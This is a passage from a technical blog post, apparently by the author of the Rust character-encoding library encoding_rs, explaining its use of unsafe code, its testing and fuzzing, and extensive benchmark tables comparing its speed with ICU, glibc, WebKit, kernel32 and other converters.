Still, considering that a Web browser gets away with relatively slow legacy encoders, chances are that many other applications do, too. In general, applications should use UTF-8 for interchange and, therefore, not use the legacy encoders except where truly needed for backward compatibility. Chances are that most applications won’t need to use the compile-time options to enhance encoder performance and if they do, it’s probably more about getting the performance on a level where untrusted input can’t exercise excessively slow code paths rather than about maximal imaginable performance being essential. At this point, it doesn’t make sense to introduce compile options that would deviate more from the Firefox-relevant code structure for the sake of winning legacy encoder benchmarks.

Safety

One generally expects Rust code to be safe. Rust code that doesn’t use unsafe is obviously safe. Rust code that uses unsafe is safe only if unsafe has been used correctly. Semi-alarmingly, encoding_rs uses unsafe quite a bit.

Still, unsafe isn’t used isn’t used in random ways. Instead, it’s for certain things and only in certain source files. In particular, it is not used inside the source files that implement the logic for legacy CJK encodings, which in the C++ implementation would be the riskiest area in terms of memory-safety bugs. This is not to say that all the unsafe is appropriate. Some of it would be avoidable right now, but the better way either didn’t exist or didn’t exist outside nightly Rust when I wrote the code, and some will likely become avoidable in the future.

Here’s an overview of the kinds of unsafe in encoding_rs:

Unchecked conversion of u32 to char

A couple of internal APIs use char to signify Unicode scalar value. However, the scalar value gets computed in a way that first yields the value as u32. Since the value is in the right range by construction, it is reinterpreted as char without the cost of the range check. Some of this use of unsafe could be avoided by using u32 instead of char internally in some places. It’s unclear if the current usage is worthwhile.

Writing to &mut str as &mut [u8]

Since dealing with character encodings is in the core competence of encoding_rs, it would be silly to run the standard library’s UTF-8 validation on encoding_rs’s UTF-8 output. Instead, encoding_rs uses unsafe to assert the validity of its UTF-8 output to the type system. It doesn’t make sense to try to get rid of this use of unsafe. It’s fundamental to the crate.

Calling Intrinsics

Rust makes intrinsics categorically unsafe even in cases where there isn’t actually anything that logically requires a given intrinsic to be unsafe. This results in the use of unsafe to call vendor-specific SIMD operations and to annotate if conditions for branch prediction using likely/unlikely. This kind of unsafe makes the code look harder to read and scarier than it actually is, but it is easy to convince oneself that this kind of unsafe is not risky in terms of the overall safety of the crate.

SIMD Bitcasts

When working with SIMD, it is necessary to convert between different lane configurations in a way that is just a type-system-level operation and on the machine level is nothing: the register is the same and the operations determine how the contents of the register are interpreted. As a consequence, reinterpreting a SIMD type of a given width in bits (always 128 bits in encoding_rs) as another SIMD type of the same width in bits should be OK if both types have integer lanes (i.e. all bit patterns are valid). I expect that in the future, Rust will gain safe wrappers for performing these reinterpretations. Such wrappers already exist behind a feature flag in the packed_simd crate.

Re-Interpreting Slices as Sequences of Different Types

The ASCII acceleration code reads and writes slices of u8 and u16 as usize (if SIMD isn’t enabled) or u8x16 and u16x8 (if SIMD is enabled). This is done by casting pointers and by dereferencing pointers. This, obviously, is not ideal in terms of confidence in the correctness of the code. Indeed, this kind of code in the mem module had a bug that made to a crates.io release of encoding_rs, though I believe no one actually deployed that code to end users before the problem is remedied.

While, based in fuzzing, I believe this code to be to correct, potentially in the future it could be more obviously correct by using align_to(_mut) on primitive slices (stabilized in Rust 1.30.0) and from_slice_aligned/from_slice_aligned and, possibly, their _unchecked variants on SIMD types in the packed_simd crate. However, some of these, notably align_to, are themselves unsafe, even though align_to wouldn’t need to be unsafe when both slice item types allow all bit patterns as their value space as primitive integers and integer-lane SIMD vectors do.

Unaligned Memory Access

Especially with SIMD but also with UTF-16LE and UTF-16BE, unaligned memory access is done with unsafe and std::ptr::copy_nonoverlapping which LLVM optimizes the same way as C’s memcpy idioms.

memcpy

In some cases, data is copied from a slice to another using std::ptr::copy_non_overlapping even when copy_from_slice on primitive slice would do and the bound check wouldn’t be too much of a performance problem. Removing remaining cases like this would not remove the unsafe that they are in, because they are right next to setting the logical length of Vec in a way that exposes uninitialized memory. Since the length is set right there anyway, it doesn’t make much sense to worry about passing the wrong length to std::ptr::copy_non_overlapping.

Avoiding Bound Checks

Perhaps the most frustrating use of unsafe is to omit bound checks on slice access that the compiler logically should be able to omit from safe code but doesn’t. I hope that in the future, LLVM gets taught more about optimizing away unnecessary bound checks in the kind of IR that rustc emits. At present, it might be possible to write the code differently without unsafe such that the resulting IR would match the kind of patterns that LLVM knows how to optimize. It is not a nice programming experience, though, to try different logically equivalent ways of expressing the code and seeing what kind of assembly comes out of the compiler.

Additionally, there are cases where an array of 128 items is accessed with a byte minus 128 after the bytes is known to have its highest bit set. This can’t be expected to be known to the optimizer in cases where the fact that the highest bit is set has been established using vendor-specific SIMD.

Testing

In the opening paragraph, I claimed high correctness. encoding_rs has been tested in various ways. There are small manually-written tests in the Rust source files for edge cases that seemed interesting. Additionally, every index item for every lookup table-based encoding is tested by generating the expectations from the data provided along via different code than the main implementation. In the context of Firefox, encoding_rs is tested using the test cases in Web Platform Tests (WPT). All encoding tests in WPT pass, except tests that test for the new TextDecoderStream and TextEncoderStream JavaScript APIs.

Additionally, encoding_rs is fuzzed using cargo-fuzz, which wraps LLVM’s coverage-guided libFuzzer for use on Rust code.

Benchmarking

Let’s finally take a look at how encoding_rs performs compared to other libraries.

Workloads

When decoding from UTF-8, the test case is the Wikipedia article for Mars, the planet, for the language in question in HTML.

Reasons for choosing Wikipedia were:

  • Wikipedia is an actual top site that’s relevant to users.
  • Wikipedia has content in all the languages that were relevant for testing.
  • Wikipedia content is human-authored (though I gather that the Simplified Chinese text not directly human-authored but is programmatically derived from human-authored Traditional Chinese text).
  • Wikipedia content is suitably licensed.

The topic Mars, the planet, was chosen, because it is the most-featured topic across the different-language Wikipedias and, indeed, had non-trivial articles in all the languages needed. Trying to choose a typical-length article for each language separately wasn’t feasible in the Wikidata data set.

The languages were chosen to represent the languages that have Web-relevant legacy encodings. In the case of windows-1252, multiple languages with different non-ASCII frequencies were used. The main shortcoming of this kind of selection is that UTF-8 is not tested with a (South Asian) language that would use three bytes per character in UTF-8 with ASCII spaces and would have more characters per typical word than Korean has.

When decoding from a non-UTF-8 encoding, the test case is synthetized from the UTF-8 test case by converting the Wikipedia article to the encoding in question and replacing unmappable characters with numeric character references (and in the case of Big5 removing a couple of characters that glibc couldn’t deal with).

When testing x-user-defined decode, the test case is a JPEG image, because loading binary data over XHR is the main performance-sensitive use case for x-user-defined.

The JavaScript case represents 100% ASCII and is a minified version of jQuery. (Wikipedia English isn’t 100% ASCII.) The numbers for uconv are missing, because the benchmark was added to the set after the builds made for uconv testing had rotted and were no longer linkable due to changes in the system C++ standard library.

Vietnamese windows-1258 workloads are excluded, because windows-1258 uses combining characters in an unusual way, so a naïve synthetization of windows-1258 test data from precomposed UTF-8 content would not have represented a real workload.

The encoder work loads use plain text extracts from the decoder test cases in order to simulate form submission (textarea) workloads. That is, the encoder benchmarks do not test ASCII runs of HTML markup, because that scenario isn’t relevant to Web-exposed browser features.

The other Web-relevant case for the encoders is the parsing of URL query strings. In the absence of errors, the query strings are ASCII.

Reference Libraries

Obviously, uconv is benchmarked to understand performance relative to what Gecko had before. rust-encoding is benchmarked to understand performance relative to what was already available in the Rust ecosystem.

ICU and WebKit are benchmarked to understand performance relative to other browsers. WebKit uses its own character encoding converters for UTF-8, UTF-16LE, UTF-16BE, x-user-defined, replacement, and windows-1252 and uses ICU for the others. Chrome inherits this approach from WebKit but has changed the error handling for UTF-8 to be spec-compliant and carries substantial patches to ICU for Encoding Standard compliance. WebKit internals were easier to make available to the benchmark harness, so only WebKit is benchmarked.

WebKit’s windows-1252 is not benchmarked, because trying to use it segfaulted and it wasn’t worthwhile to debug the failure. WebKit on macOS is built with clang, of course, but hopefully building with GCC gives a general idea.

ICU is benchmarked as shipped in Ubuntu, but hopefully that’s close enough performance-wise to the copies of ICU used by Safari and Chrome.

kernel32.dll and glibc represent system APIs. I believe Core Foundation on Mac uses ICU internally, so in that sense ICU also represents a system API. I have no idea if the converters in kernel32.dll are performance-wise representative of what Edge and IE use. (kernel32.dll provides only a non-streaming API publicly while Edge and IE clearly need streaming converters.)

Bob Steagall’s UTF-8 to UTF-16 decoder is benchmarked, because an entire talk claiming excellent results was recently dedicated to it at CppCon and it indeed turned out to be exceptional in its speed for non-ASCII input.

Apples to Oranges Comparisons

Some the comparisons could be considered to compare things that aren’t commensurable. In particular:

  • Except for kernel32, the measurements exclude the initialization and destruction of the converter. This is to the advantage of uconv, ICU and glibc, which perform more work during converter initialization than encoding_rs does. kernel32 does not expose converter initialization is a distinct operation and it’s not clear if there is an initialization cost the first time a given converter is used or every time.

  • When converting to and from UTF-8, in the comparison with rust-encoding, rust-encoding targets String and Vec<u8> while encoding_rs uses Cows. In this case, instead of trying to make the comparison fair by making encoding_rs make a useless copy, the comparison demonstrates the benefits of conditionally copy-free Rust API design.

  • The WebKit API shows traces of Qt’s converter design. This includes always allocating a buffer on the heap for output. As a result, the WebKit numbers include the allocation and deallocation of the output buffer but those numbers are compared with encoding_rs numbers that don’t include buffer allocation and deallocation.

  • Since a reference libraries do not fully conform to the Encoding Standard, the work being performed isn’t exactly the same. Instead, the closest approximation of a given legacy encoding is used. Even the error handling can differ: WebKit’s UTF-16BE and UTF-16LE converters don’t check for unpaired surrogates and kernel32 shows unpolished behavior on errors.

  • Arguably, UTF-8 isn’t the native application-side Unicode representation of glibc. However, since e.g. glib (the infrastructure library used by GTK+) uses UTF-8 as its native application-side Unicode representation and wraps glibc for the conversions from external encodings, testing glibc’s performance to and from UTF-8 is relevant to how glibc is used even if arguably unfair.

  • When encoding from UTF-8, encoding_rs and rust-encoding assume the input is valid, but glibc does not.

Reading the Tables

The columns are grouped into decode results and into encode results. Those groups, in turn, are grouped into using UTF-16 as the internal Unicode representation and into using UTF-8 as the internal Unicode representation. Both cases are supported by encoding_rs but the libraries being compared with support one or the other. Then there is a column for each library whose performance is being compared with.

  • uconv is Gecko’s old encoding converter library with the numbers run in November 2016 on Ubuntu 16.04 with Ubuntu-provided GCC and before Spectre/Meltdown kernel mitigations. It would be fair to recompile with current clang, but I deemed it too much effort to get 2016 Gecko building on a 2018 system.
  • ICU is ICU 60 as shipped on Ubuntu 18.04.
  • kernel32 is kernel32.dll included in Windows 10 1803.
  • WebKit is WebKitGTK+ 2.22.2 built with the default options (-O2) with GCC 7.3.0 on Ubuntu 18.04.
  • kewb is Bob Steagall’s SSE2-accelerated converter presented at CppCon2018 built with clang at -O3.
  • stdlib is Rust’s standard library.
  • rust-encoding is rust-encoding 0.2.33.
  • glibc is glibc’s iconv as shipped on Ubuntu 18.04.

Each row names a language and an external encoding to convert from or to. The numbers are encoding_rs speed factors relative to the library named in the column. 2.0 means that encoding_rs is twice as fast as the reference library named in the column header. 0.5 means that the reference library named in the column header is twice as fast as encoding_rs. 0.00 means that encoding_rs is relatively very slow (still user-perceptibly fast enough for the form submission use case in a browser) and the non-zero decimals didn’t show up in the second decimal position.

Benchmark Results

encoding_rs and rust-encoding are built with Rust’s default optimization level opt_level=3 even though encoding_rs in Firefox is built at opt_level=2 for the time being. encoding_rs in Firefox is expected to switch to opt_level=3 soon. For these benchmarks, at least on x86_64 Haswell, there is no practical difference between opt_level=2 and opt_level=3 being applied to encoding_rs. However, previously there have been issues with opt_level=2 that I would rather not have investigated, so I am really looking forward to using opt_level=3 in the Gecko context. Also kewb is built at -O3. The Rust version was 1.32.0-nightly (9fefb6766 2018-11-13).

In all cases, the default rustc optimization target for a given instruction set architecture was used. That is, e.g. the Haswell numbers mean running the code compiled for the generic x86_64 target on a Haswell chip and do not mean asking the compiler to optimize for Haswell specifically.

x86_64 Intel Core i7-4770 @ 3.40 GHz (Haswell, desktop)

encoding_rs uses SSE2 explicitly. Since SSE2 is part of the x86_64 baseline instruction set, other software is eligible for SSE2 autovectorization or to enable explicit SSE2 parts if they have them. At least uconv had an explicit SSE2 code path for ASCII in the UTF-8 to UTF-16 decoder.

DecodeEncode
UTF-16UTF-8UTF-16UTF-8
uconv ICU kernel32 WebKit kewb stdlib rust-encoding glibc uconv ICU kernel32 WebKit rust-encoding glibc
Arabic, UTF-8 2.47 2.68 1.26 1.77 0.98 1.37 4.68 5.73 0.85 0.85 0.75 1.15 4024.12 110.89
Czech, UTF-8 2.55 2.84 1.57 1.78 0.67 2.01 9.96 10.60 1.04 1.23 0.93 1.42 9055.00 104.12
German, UTF-8 3.36 5.95 2.77 2.90 1.03 2.14 22.60 19.19 3.43 4.14 1.71 5.10 3469.75 73.62
Greek, UTF-8 2.52 2.96 1.37 1.88 1.01 1.38 5.72 6.80 0.86 0.90 0.77 1.15 5492.50 105.05
English, UTF-8 2.79 8.57 3.65 3.66 1.14 1.82 61.74 31.99 7.46 11.07 3.76 14.20 632.38 69.89
JavaScript, UTF-8 11.42 4.77 0.81 1.05 1.58 30.02 45.80 13.84 5.20 17.84 682.12 63.83
French, UTF-8 2.82 4.20 2.06 2.16 0.77 1.80 14.54 13.80 1.25 1.54 0.87 1.84 14217.50 80.27
Hebrew, UTF-8 2.45 2.50 1.26 1.71 0.93 1.47 4.67 5.78 0.81 0.87 0.72 1.04 9654.38 113.19
Portuguese, UTF-8 2.94 4.91 2.33 2.44 0.86 1.85 17.65 15.90 1.89 2.30 1.06 2.77 5188.50 79.98
Russian, UTF-8 2.46 2.73 1.29 1.81 0.96 1.41 5.07 6.11 0.81 0.90 0.75 1.02 21188.00 109.55
Thai, UTF-8 3.11 3.99 1.67 2.06 1.18 1.59 10.15 10.38 1.09 1.47 1.06 1.41 16414.75 68.88
Turkish, UTF-8 2.47 2.53 1.47 1.70 0.67 2.04 8.93 9.74 1.01 1.19 0.89 1.35 10995.38 104.52
Vietnamese, UTF-8 2.37 2.31 1.31 1.63 0.78 1.90 6.62 7.58 0.90 1.01 0.84 1.08 27145.50 145.72
Simplified Chinese, UTF-8 3.02 3.40 1.67 1.96 1.06 1.90 8.93 9.49 1.15 1.58 1.03 1.55 3575.00 75.42
Traditional Chinese, UTF-8 3.05 3.42 1.68 1.96 1.07 1.90 8.98 9.54 1.15 1.58 1.03 1.55 3600.25 74.89
Japanese, UTF-8 3.26 3.47 1.66 1.99 1.15 1.94 8.40 9.20 1.14 1.60 1.07 1.56 2880.12 71.67
Korean, UTF-8 2.98 2.85 1.54 1.89 1.01 1.90 6.48 7.56 1.10 1.39 0.89 1.33 3929.12 108.69
Arabic, windows-1256 1.62 1.12 0.82 5.15 4.03 3.27 0.37 0.05 0.72 0.86
Czech, windows-1250 2.49 1.71 1.25 7.87 7.00 2.71 0.65 0.12 1.01 1.12
German, windows-1252 7.25 4.99 3.66 25.07 22.76 32.31 6.82 1.64 12.89 12.02
Greek, windows-1253 2.12 1.46 1.07 6.36 5.01 7.03 1.43 0.20 2.06 2.00
English, windows-1252 9.96 6.85 5.02 47.65 43.28 96.70 20.12 5.10 58.56 55.80
French, windows-1252 4.29 2.95 2.16 13.91 12.51 10.67 2.33 0.53 4.24 4.04
Hebrew, windows-1255 1.96 1.07 0.78 5.19 4.88 7.05 1.34 0.18 1.98 1.78
Portuguese, windows-1252 5.46 3.75 2.75 18.32 16.51 17.36 3.78 0.87 6.53 6.14
Russian, windows-1251 1.63 1.12 0.82 5.21 4.00 4.97 1.36 0.19 2.04 1.91
Thai, windows-874 3.36 2.31 1.69 5.83 4.70 3.99 0.59 0.10 1.18 1.03
Turkish, windows-1254 2.28 1.57 1.15 7.02 6.21 4.61 0.84 0.16 1.32 1.48
Simplified Chinese, gb18030 3.68 3.64 5.04 6.40 4.73 0.23 0.01 0.02 0.01 0.01
Traditional Chinese, Big5 3.24 3.08 1.87 6.13 4.36 1.29 0.01 0.00 0.01 0.02
Japanese, EUC-JP 2.85 2.79 1.69 5.17 3.78 1.26 0.02 0.01 0.03 0.17
Japanese, ISO-2022-JP 0.94 1.80 1.07 2.91 2.10 0.61 0.06 0.06 0.03 0.15
Japanese, Shift_JIS 1.72 2.35 1.42 4.66 3.41 0.62 0.01 0.01 0.03 0.03
Korean, EUC-KR 39.64 3.47 2.24 5.81 4.08 84.85 0.31 0.20 0.56 0.53
x-user-defined 12.87 25.29 3.03
Arabic, UTF-16LE 13.48 6.33 4.17 4.74 3.47
Czech, UTF-16LE 13.54 6.33 4.17 7.20 5.33
German, UTF-16LE 13.48 6.34 4.18 14.87 10.86
Greek, UTF-16LE 13.49 6.33 4.18 5.70 4.16
English, UTF-16LE 13.43 6.33 4.17 32.86 24.17
French, UTF-16LE 13.51 6.33 4.17 11.58 8.43
Hebrew, UTF-16LE 13.50 6.33 4.18 4.55 3.38
Portuguese, UTF-16LE 13.50 6.33 4.17 13.66 9.94
Russian, UTF-16LE 13.52 6.33 4.17 5.00 3.63
Thai, UTF-16LE 13.33 6.33 4.17 8.40 6.03
Turkish, UTF-16LE 13.42 6.33 4.17 6.47 4.83
Vietnamese, UTF-16LE 13.51 6.33 4.17 5.48 4.13
Simplified Chinese, UTF-16LE 13.52 6.33 8.38 7.60 5.59
Traditional Chinese, UTF-16LE 13.48 6.33 8.38 7.58 5.58
Japanese, UTF-16LE 13.54 6.33 4.18 6.69 4.90
Korean, UTF-16LE 13.84 6.49 4.29 5.49 4.14
Arabic, UTF-16BE 11.30 5.29 3.49 4.17 3.11
Czech, UTF-16BE 11.15 5.29 3.49 6.59 5.04
German, UTF-16BE 11.32 5.29 3.49 12.85 9.79
Greek, UTF-16BE 11.30 5.28 3.49 5.00 3.73
English, UTF-16BE 11.26 5.29 3.48 26.03 20.02
French, UTF-16BE 11.28 5.29 3.48 10.09 7.70
Hebrew, UTF-16BE 11.26 5.28 3.49 4.04 3.03
Portuguese, UTF-16BE 11.29 5.29 3.49 11.77 8.98
Russian, UTF-16BE 11.27 5.29 3.48 4.43 3.27
Thai, UTF-16BE 11.22 5.29 3.48 7.63 5.63
Turkish, UTF-16BE 11.31 5.29 3.49 5.97 4.60
Vietnamese, UTF-16BE 11.29 5.29 3.48 5.03 3.87
Simplified Chinese, UTF-16BE 11.27 5.29 7.00 6.85 5.17
Traditional Chinese, UTF-16BE 11.31 5.29 7.00 6.84 5.16
Japanese, UTF-16BE 11.31 5.29 3.49 6.08 4.55
Korean, UTF-16BE 11.44 5.36 3.54 4.90 3.77

The above table shows the results with the SIMD enabled for encoding_rs but without encode-specific data tables beyond 32 bits of encode-specefic data for each single-byte encoding).

With indexable lookup tables for the CJK Unified Ideographs and Hangul Syllables Unicode blocks, but otherwise retaining the same encoder structure, encoding_rs performs CJK legacy encode like this:

Encode
UTF-16UTF-8
uconv ICU kernel32 rust-encoding glibc
Simplified Chinese, gb18030 24.53 0.74 2.42 0.97 0.80
Traditional Chinese, Big5 160.73 0.68 0.31 1.30 2.07
Japanese, EUC-JP 47.25 0.68 0.21 0.93 5.29
Japanese, ISO-2022-JP 20.81 1.99 2.10 0.94 4.56
Japanese, Shift_JIS 29.04 0.59 0.26 1.41 1.01
Korean, EUC-KR 372.45 1.36 0.90 2.15 2.05
ARMv7+NEON Exynos 5

Windows 10 is not available, kewb is not optimized for ARM, and browsers are excluded due to compilation problems. encoding_rs and rust-encoding are compiled with NEON enabled. Only encoding_rs uses NEON explicitly. Notably, NEON is less suited for feeding back into control flow than SSE2, so NEON is not used for validating ASCII, so the comparison with the Rust standard library ends up being an ALU vs. ALU comparison.

DecodeEncode
UTF-16UTF-8UTF-16UTF-8
ICU stdlib rust-encoding glibc ICU rust-encoding glibc
Arabic, UTF-8 2.15 1.21 2.71 5.28 0.93 5974.90 164.96
Czech, UTF-8 1.96 1.26 4.19 7.27 1.13 10653.25 75.24
German, UTF-8 2.89 1.20 7.13 11.32 2.54 5299.90 57.87
Greek, UTF-8 2.29 1.17 3.10 5.96 0.95 7891.35 159.49
English, UTF-8 4.25 1.07 13.82 15.11 4.66 2038.65 57.17
JavaScript, UTF-8 5.15 1.01 6.97 18.02 5.63 2120.60 57.11
French, UTF-8 2.73 1.22 7.95 9.88 1.61 16413.40 61.95
Hebrew, UTF-8 2.08 1.26 2.77 5.36 0.96 13160.95 93.50
Portuguese, UTF-8 2.80 1.22 8.66 10.39 1.87 6767.35 60.16
Russian, UTF-8 2.22 1.20 3.45 5.36 0.97 28588.75 98.30
Thai, UTF-8 3.32 1.41 6.11 9.33 1.84 28600.00 143.92
Turkish, UTF-8 1.84 1.25 3.78 6.74 1.13 12253.10 73.99
Vietnamese, UTF-8 1.76 1.32 4.06 6.11 1.06 29650.00 111.16
Simplified Chinese, UTF-8 2.46 1.43 4.09 7.94 1.82 5748.35 238.95
Traditional Chinese, UTF-8 2.46 1.43 4.16 8.01 1.82 5872.95 171.07
Japanese, UTF-8 2.48 1.45 3.79 8.92 1.88 5498.10 168.30
Korean, UTF-8 2.02 1.40 3.21 6.49 1.25 5938.90 198.42
Arabic, windows-1256 0.58 3.01 3.66 0.36 0.96 1.08
Czech, windows-1250 0.96 4.11 6.73 0.54 1.02 1.20
German, windows-1252 1.72 5.64 14.03 2.89 6.06 7.14
Greek, windows-1253 0.73 3.03 4.65 1.09 2.49 2.26
English, windows-1252 2.66 6.79 27.79 5.08 20.01 24.02
French, windows-1252 1.39 4.69 9.69 1.80 3.24 3.86
Hebrew, windows-1255 0.58 2.68 4.42 1.14 2.58 2.22
Portuguese, windows-1252 1.64 5.61 12.78 2.16 4.09 4.77
Russian, windows-1251 0.60 3.15 3.79 1.16 2.65 2.35
Thai, windows-874 0.98 3.64 5.88 0.60 1.87 2.46
Turkish, windows-1254 0.87 3.85 6.07 0.65 1.22 1.48
Simplified Chinese, gb18030 1.74 4.08 4.02 0.01 0.01 0.02
Traditional Chinese, Big5 1.73 4.57 4.40 0.01 0.02 0.04
Japanese, EUC-JP 1.61 3.91 4.26 0.03 0.04 0.22
Japanese, ISO-2022-JP 1.96 2.12 1.98 0.09 0.04 0.20
Japanese, Shift_JIS 1.41 3.46 3.77 0.02 0.04 0.06
Korean, EUC-KR 1.73 5.75 4.59 0.29 0.57 0.51
x-user-defined 2.44
Arabic, UTF-16LE 4.64 2.64 3.64
Czech, UTF-16LE 4.65 3.51 5.71
German, UTF-16LE 4.64 4.61 9.66
Greek, UTF-16LE 4.73 2.87 4.19
English, UTF-16LE 4.51 5.52 13.75
French, UTF-16LE 3.03 4.07 7.10
Hebrew, UTF-16LE 4.75 2.60 3.57
Portuguese, UTF-16LE 4.61 5.19 9.23
Russian, UTF-16LE 4.59 3.12 3.82
Thai, UTF-16LE 3.78 3.66 6.59
Turkish, UTF-16LE 4.61 3.33 5.22
Vietnamese, UTF-16LE 4.59 3.54 4.80
Simplified Chinese, UTF-16LE 4.61 3.32 5.88
Traditional Chinese, UTF-16LE 4.61 3.32 5.87
Japanese, UTF-16LE 4.74 3.02 5.35
Korean, UTF-16LE 4.73 4.24 4.59
Arabic, UTF-16BE 2.85 2.30 3.11
Czech, UTF-16BE 2.84 3.02 4.68
German, UTF-16BE 2.84 3.94 7.49
Greek, UTF-16BE 2.93 2.50 3.55
English, UTF-16BE 2.79 4.70 10.07
French, UTF-16BE 2.05 3.38 5.37
Hebrew, UTF-16BE 2.93 2.27 3.06
Portuguese, UTF-16BE 2.87 4.44 7.19
Russian, UTF-16BE 2.83 2.75 3.24
Thai, UTF-16BE 2.49 3.09 5.33
Turkish, UTF-16BE 2.83 2.85 4.30
Vietnamese, UTF-16BE 2.85 3.03 3.98
Simplified Chinese, UTF-16BE 2.83 2.85 4.84
Traditional Chinese, UTF-16BE 2.82 2.87 4.84
Japanese, UTF-16BE 2.94 2.62 4.52
Korean, UTF-16BE 2.93 3.51 3.88
aarch64 ThunderX

I lack access to Windows 10 on aarch64, kewb is not optimized for aarch64, either, and browsers were excluded for compilation problems. As with x86_64, SIMD is part of the baseline compiler target instruction set on aarch64.

While I was not paying attention, ALU code for ASCII validation has gained speed relative to SIMD-based ASCII validation. I suspect this might be due to LLVM updates since LLVM 4. For this reason, I have moved aarch64 to use ALU code for ASCII validation pending more investigation of how to fix the SIMD code.

These numbers are from ThunderX, which is a server chip. Furthermore, this is the first-generation ThunderX, which is an in-order design. Benchmarking on phones does not make sense, because their clock speeds vary all over all the time due to thermal throttling, so benchmark results are not repeatable. Moreover, the thermal throttling may be rather fine-grained, so it is not feasible to identify throttling by looking at a clear 50% drop as is feasible e.g. with Raspberry Pi 3. The problem with ThunderX and Raspberry Pi 3 is that they use cores with in-order designs while high-end phones use more advanced out-of-order designs. It is quite frustrating that there is not good information about what non-phone computers with aarch64 chips might be able to hold a stable clock speed when running a compute benchmark for the purpose of testing small changes in implementation details. Stable clock speed is not a characteristic of ARM hardware and kernel combination that gets advertised or talked about on forums. (In the ARMv7+NEON case, I just happened to discover that a piece of hardware, Samsung Chromebook 2 with Crouton, suited my needs.)

DecodeEncode
UTF-16UTF-8UTF-16UTF-8
ICU stdlib rust-encoding glibc ICU rust-encoding glibc
Arabic, UTF-8 1.81 1.14 3.53 5.74 0.85 4358.21 43.56
Czech, UTF-8 1.63 1.19 5.72 7.97 1.00 7739.88 24.20
German, UTF-8 1.89 1.16 8.67 10.77 1.96 5448.46 20.42
Greek, UTF-8 1.91 1.16 4.16 6.55 0.88 6339.08 36.21
English, UTF-8 2.10 1.03 10.98 12.73 2.57 2585.88 19.28
JavaScript, UTF-8 2.49 1.01 9.24 17.81 4.18 3874.54 39.83
French, UTF-8 1.79 1.17 7.59 10.03 1.48 14883.29 21.76
Hebrew, UTF-8 1.77 1.16 3.56 5.82 0.86 10102.21 30.73
Portuguese, UTF-8 1.88 1.16 8.43 10.46 1.64 6257.67 20.99
Russian, UTF-8 1.90 1.17 3.73 6.08 0.91 22567.83 29.29
Thai, UTF-8 2.28 1.05 4.43 6.74 1.29 29472.83 24.38
Turkish, UTF-8 1.59 1.21 5.35 7.63 1.02 9224.92 23.80
Vietnamese, UTF-8 1.55 1.12 4.27 6.33 0.84 20106.71 26.71
Simplified Chinese, UTF-8 1.98 1.19 4.67 6.83 1.27 5704.42 35.09
Traditional Chinese, UTF-8 1.97 1.18 4.62 6.77 1.28 5706.46 35.22
Japanese, UTF-8 2.05 1.18 4.04 6.10 1.31 5963.42 76.90
Korean, UTF-8 1.81 1.18 3.89 5.89 0.93 4173.88 37.93
Arabic, windows-1256 1.35 4.26 3.29 0.44 0.86 1.00
Czech, windows-1250 1.72 6.75 5.68 0.62 1.07 1.12
German, windows-1252 2.12 9.87 8.33 3.17 6.46 6.71
Greek, windows-1253 1.50 4.93 3.87 1.26 1.74 1.56
English, windows-1252 2.32 12.30 10.39 4.28 11.15 11.59
French, windows-1252 1.98 8.72 7.36 2.38 4.23 4.36
Hebrew, windows-1255 1.34 4.32 4.09 1.26 1.73 1.36
Portuguese, windows-1252 2.08 9.60 8.04 2.68 4.98 5.15
Russian, windows-1251 1.37 4.37 3.43 1.27 1.76 1.52
Thai, windows-874 1.69 5.04 4.11 0.82 1.33 1.14
Turkish, windows-1254 1.65 6.34 5.30 0.80 1.37 1.45
Simplified Chinese, gb18030 1.93 6.94 3.22 0.01 0.01 0.01
Traditional Chinese, Big5 1.92 5.65 3.65 0.01 0.01 0.02
Japanese, EUC-JP 1.86 6.16 3.07 0.02 0.04 0.19
Japanese, ISO-2022-JP 1.88 2.95 1.60 0.05 0.04 0.21
Japanese, Shift_JIS 1.69 5.21 3.08 0.02 0.04 0.03
Korean, EUC-KR 1.98 6.07 3.36 0.30 0.59 0.46
x-user-defined
Arabic, UTF-16LE 3.27 4.40 3.50
Czech, UTF-16LE 3.27 6.03 4.74
German, UTF-16LE 3.26 7.75 6.02
Greek, UTF-16LE 3.26 5.07 3.98
English, UTF-16LE 3.24 9.22 7.18
French, UTF-16LE 3.22 7.25 5.74
Hebrew, UTF-16LE 3.26 4.41 3.50
Portuguese, UTF-16LE 3.29 7.90 6.16
Russian, UTF-16LE 3.25 4.72 3.73
Thai, UTF-16LE 3.31 5.77 4.73
Turkish, UTF-16LE 3.27 5.75 4.55
Vietnamese, UTF-16LE 3.30 5.11 4.21
Simplified Chinese, UTF-16LE 3.26 5.79 4.59
Traditional Chinese, UTF-16LE 3.26 5.78 4.58
Japanese, UTF-16LE 3.26 5.34 4.24
Korean, UTF-16LE 3.28 4.90 3.89
Arabic, UTF-16BE 2.56 3.82 2.83
Czech, UTF-16BE 2.56 4.94 3.60
German, UTF-16BE 2.57 6.38 4.64
Greek, UTF-16BE 2.57 4.40 3.21
English, UTF-16BE 2.56 7.47 5.48
French, UTF-16BE 2.51 5.82 4.36
Hebrew, UTF-16BE 2.57 3.82 2.82
Portuguese, UTF-16BE 2.54 6.42 4.64
Russian, UTF-16BE 2.58 4.09 3.01
Thai, UTF-16BE 2.63 4.97 3.81
Turkish, UTF-16BE 2.56 4.71 3.44
Vietnamese, UTF-16BE 2.59 4.18 3.14
Simplified Chinese, UTF-16BE 2.56 4.92 3.64
Traditional Chinese, UTF-16BE 2.56 4.93 3.63
Japanese, UTF-16BE 2.57 4.61 3.43
Korean, UTF-16BE 2.57 4.17 3.06

Notable Observations

Rather expectedly, for ASCII on x86_64, SIMD is a lot faster than not using SIMD and encode to legacy encodings without encode-oriented data tables is relatively slow (but, again, still user-perceptibly fast enough even on low-end hardware for the form submission use case for legacy encoders in a Web browser). Also, the naïve the code structure that remains in the ISO-2022-JP decoder is slower than the kind of code structure that uses the program counter as part of the two-byte state tracking leading to more predictable branches.

glibc

Unlike the other libraries that convert to UTF-16 or UTF-8, glibc supports conversions from any encoding into any other by pivoting via UTF-32 on a per scalar value basis. This generality has a cost. I think the main take-away for application developers is that a standard library implementation covers a lot of functionality and not all those areas are optimized, so you should not assume that a library is fast at everything just because it is a core system library that has been around for a long time.

As noted earlier, in the “Apples to Oranges Comparisons”, when encoding from UTF-8, glibc treats the input as potentially invalid, but encoding_rs assumes validity, so when encoding from UTF-8 to UTF-8, the encoding_rs numbers are basically for memcpy but glibc inspects everything.

kernel32

